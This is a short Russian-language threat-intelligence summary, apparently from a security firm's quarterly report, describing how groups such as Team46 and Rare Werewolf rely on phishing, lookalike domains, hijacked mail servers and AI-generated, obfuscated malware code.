Во втором квартале текущего года мы фиксировали заметный рост активности как хакерских группировок, так и хактивистов. При этом в подавляющем большинстве случаев первоначальным вектором атак остается фишинговая рассылка — будь то сложные атаки Team46 с эксплойтами нулевого дня или действия хакеров Rare Werewolf, использующих bat- и ps1-скрипты в связке с AnyDesk. Для рассылок злоумышленники регистрируют домены, визуально имитирующие легитимные, прибегают к захваченным реальным почтовым ресурсам, как это практикует Werewolves, либо покупают инфраструктуру у третьих лиц, которым доверяют рассылку фишинга. Параллельно мы наблюдаем рост числа вирусных файлов, содержащих сгенерированные нейросетями фрагменты кода, что связано с широкой доступностью облачных AI-сервисов и стремительного развития языковых моделей, позволяющих злоумышленникам быстро адаптировать и обфусцировать вредоносные модули для обхода классических средств защиты.